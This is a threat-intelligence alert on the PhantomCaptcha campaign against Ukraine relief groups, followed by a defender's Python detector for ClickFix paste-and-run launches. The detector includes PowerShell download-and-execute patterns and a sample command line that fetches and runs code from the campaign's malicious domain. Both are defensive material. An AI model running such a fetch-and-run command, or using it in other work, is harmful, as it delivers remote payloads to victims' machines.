PhantomCaptcha Campaign Targets Ukraine Relief Organizations
Category: Threat Alerts / Threat Intelligence
SentinelLabs uncovered the PhantomCaptcha campaign targeting humanitarian and government organizations involved in Ukraine relief efforts. Attackers impersonated the Ukrainian President’s Office using PDF lures to deliver multi-stage malware via fake Zoom pages hosted on Russian infrastructure. The final payload enabled reconnaissance, command execution, and data exfiltration through WebSocket-based RATs. The campaign operated briefly to evade detection while maintaining persistent backend servers for control.
CORTEX Protocol Intelligence Assessment
Business Impact: The targeting of humanitarian and relief organizations underscores how advanced threat actors exploit global crises.
Technical Context: PhantomCaptcha leverages social engineering (the ‘ClickFix’ technique) and short-lived infrastructure, indicating disciplined operational security by a state-aligned actor.
Strategic Intelligence Guidance
- Train NGO and humanitarian staff to identify phishing via impersonation lures.
- Block malicious domains (e.g., zoomconference[.]app) and track infrastructure overlap.
- Deploy PowerShell execution restrictions to prevent ‘Paste-and-Run’ abuse.
- Enforce content-disarm solutions for PDF attachments.
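As an added defender-side example (not code from the SentinelLabs report or from this alert), the following Python sketch applies the domain-blocking and Paste-and-Run guidance above to constructed process-creation events: it refangs the alert's defanged domain for matching and flags PowerShell launched from the Windows Run box with a hidden window and an in-memory download-and-execute chain. The event fields, the sample command lines and the placeholder URL path are assumptions.

```python
import re
from dataclasses import dataclass

# Domain published (defanged) in this alert; refanged below for matching.
BLOCKLIST_DEFANGED = ["zoomconference[.]app"]

def refang(indicator: str) -> str:
    """Turn a defanged indicator such as zoomconference[.]app into a matchable domain."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")

BLOCKLIST = {refang(d) for d in BLOCKLIST_DEFANGED}

# Paste-and-Run (ClickFix) shape: explorer.exe (Win+R / Run box) starts PowerShell with a
# hidden window and a download-then-execute chain that never touches disk.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_EXEC = re.compile(
    r"\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring)\b"
    r"|\b(iwr|invoke-webrequest|downloadstring)\b.*\b(iex|invoke-expression)\b", re.I)

@dataclass
class ProcessEvent:          # assumed field names, modelled on a process-creation log
    parent: str
    image: str
    command_line: str

def blocked_domain_hits(cmd: str) -> set:
    low = cmd.lower()
    return {d for d in BLOCKLIST if d in low}

def classify(event: ProcessEvent) -> list:
    """Return the detection labels that fire for one process-creation event."""
    labels = []
    cmd = event.command_line
    is_powershell = event.image.lower().endswith(("powershell.exe", "pwsh.exe"))
    from_run_box = event.parent.lower().endswith("explorer.exe")
    if is_powershell and from_run_box and HIDDEN_WINDOW.search(cmd) and DOWNLOAD_EXEC.search(cmd):
        labels.append("clickfix_paste_and_run")
    if blocked_domain_hits(cmd):
        labels.append("blocklisted_domain")
    return labels

# Constructed sample events (not from the report); only the first mimics a Paste-and-Run launch.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c \"iex (iwr 'https://zoomconference.app/PLACEHOLDER')\""),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -NoProfile -Command Get-Process"),
    ProcessEvent(r"C:\Program Files\Zoom\bin\Zoom.exe", r"C:\Program Files\Zoom\bin\Zoom.exe",
                 "Zoom.exe --url=zoommtg://zoom.us/join"),
]

def scan(events) -> dict:
    """Map event index -> labels for every event that triggers at least one detection."""
    return {i: labels for i, e in enumerate(events) if (labels := classify(e))}
```

Run it as `python clickfix_check.py` after adding a loop that prints `scan(SAMPLE_EVENTS)`; in production the same `classify` would be fed by a Sysmon or EDR process-creation feed.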
Intelligence Source: PhantomCaptcha Campaign Targets Ukraine Relief Organizations | Oct 23, 2025